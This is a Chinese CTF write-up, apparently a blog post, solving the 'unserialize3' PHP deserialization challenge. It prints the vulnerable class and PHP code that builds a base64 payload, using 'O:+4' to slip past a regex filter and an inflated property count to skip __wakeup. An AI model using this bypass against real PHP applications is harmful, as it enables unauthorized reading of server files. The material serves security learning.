当前位置:网站首页>攻防世界Web进阶区unserialize3题解
攻防世界Web进阶区unserialize3题解
2022-07-07 22:09:00 【B_secretary】
<?php
class Demo {
private $file = 'index.php';
//构造函数,在变量创建时自动调用,__意为魔术方法,在符合条件时会自动调用
public function __construct($file) {
$this->file = $file;
//“->”在PHP中相当于Python的“.”,用于调用对象的方法
}
//析构函数,在变量销毁时自动调用
function __destruct() {
echo @highlight_file($this->file, true);
}
//打印file中的内容,将文件显示给读者
/* highlight_file(filename,return) 函数对文件进行语法高亮显示,如果 return 参数被设置为true,那么该函数会返回被高亮处理的代码,而不是输出它们。
整段代码的意思就是当文件销毁时会输出$file的代码。at符号(@)在PHP中用作错误控制操作符。当表达式附加@符号时,将忽略该表达式可能生成的错误消息。*/
//在反序列化时会自动调用
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
//将文件名一律变为“index.php”
}
}
if (isset($_GET['var'])) {
/*判断变量var是否被创建,检测变量是否已设置并且非NULL,这段代码就是检测是否传递了get请求的var变量*/
$var = base64_decode($_GET['var']);
//将var解base64编码
if (preg_match('/[oc]:\d+:/i', $var)) {
//匹配var中是否有字符串
die('stop hacking!');
} else {
@unserialize($var);
//反序列化var,此时会调用wakeup函数
}
} else {
highlight_file("index.php");
//显示高亮index.php,这不是我们想要的结果
}
?>
题目源码中告诉我们flag在f14g.php中,所以我们想要进入这个文件,那么payload需要满足:
1、不含有preg_match中过滤的字符串或者直接绕过preg_match函数
2、反序列化时绕过wakeup函数
所以我们用序列化的方式构造一个var传入,让变量的value等于f14g.php,那么变量销毁时就会通过析构函数显示f14g.php
构造payload代码:
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
$this->file = 'index.php';
}
}
}
$payload = new Demo('fl4g.php');//创建对象Demo,其file值为f14g.php
$payload = serialize($payload);//序列化操作
$payload = str_replace('O:4', 'O:+4',$payload);
//将其中的“0:4”换成“0:+4”从而绕过正则
$payload = str_replace(':1:', ':2:' ,$payload);
//将序列化中对象个数“1”改为“2”,从而绕过wakeup函数(序列化中记录对象个数的值比对象真正个数大即可绕过wakeup)
//序列化中不可打印的空白等价于%00,到时候需要在payload中加上
echo base64_encode($payload); //对参数进行 base64 编码并打印出来
?>
边栏推荐
- Resolve the URL of token
- Anaconda+pycharm+pyqt5 configuration problem: pyuic5 cannot be found exe
- 【編程題】【Scratch二級】2019.12 飛翔的小鳥
- STM32F1与STM32CubeIDE编程实例-旋转编码器驱动
- AWS AWS help error
- One click free translation of more than 300 pages of PDF documents
- Robomaster visual tutorial (1) camera
- 【编程题】【Scratch二级】2019.09 绘制雪花图案
- Set up personal network disk with nextcloud
- Robomaster visual tutorial (11) summary
猜你喜欢
[programming problem] [scratch Level 2] March 2019 draw a square spiral
自动化测试:Robot FrameWork框架90%的人都想知道的实用技巧
The function is really powerful!
Go learning notes (2) basic types and statements (1)
Les mots ont été écrits, la fonction est vraiment puissante!
Uic564-2 Appendix 4 - flame retardant fire test: flame diffusion
Benchmarking Detection Transfer Learning with Vision Transformers(2021-11)
Using Google test in QT
STM32F1與STM32CubeIDE編程實例-旋轉編碼器驅動
At the age of 35, I made a decision to face unemployment
随机推荐
STM32F1與STM32CubeIDE編程實例-旋轉編碼器驅動
腾讯安全发布《BOT管理白皮书》|解读BOT攻击,探索防护之道
Restricted linear table
Codeworks 5 questions per day (average 1500) - day 8
The function is really powerful!
new和delete的底层原理以及模板
数据库查询——第几高的数据?
Stm32f1 and stm32cubeide programming example - rotary encoder drive
[研发人员必备]paddle 如何制作自己的数据集,并显示。
Opengl3.3 mouse picking up objects
Linkedblockingqueue source code analysis - add and delete
【编程题】【Scratch二级】2019.03 垃圾分类
2022-07-07:原本数组中都是大于0、小于等于k的数字,是一个单调不减的数组, 其中可能有相等的数字,总体趋势是递增的。 但是其中有些位置的数被替换成了0,我们需要求出所有的把0替换的方案数量:
Chisel tutorial - 03 Combinatorial logic in chisel (chisel3 cheat sheet is attached at the end)
Is it safe for tongdaxin to buy funds?
80%的人答错,苹果logo上的叶子到底朝左还是朝右?
DataGuard active / standby cleanup archive settings
用语雀写文章了,功能真心强大!
Robomaster visual tutorial (0) Introduction
ROS from entry to mastery (IX) initial experience of visual simulation: turtlebot3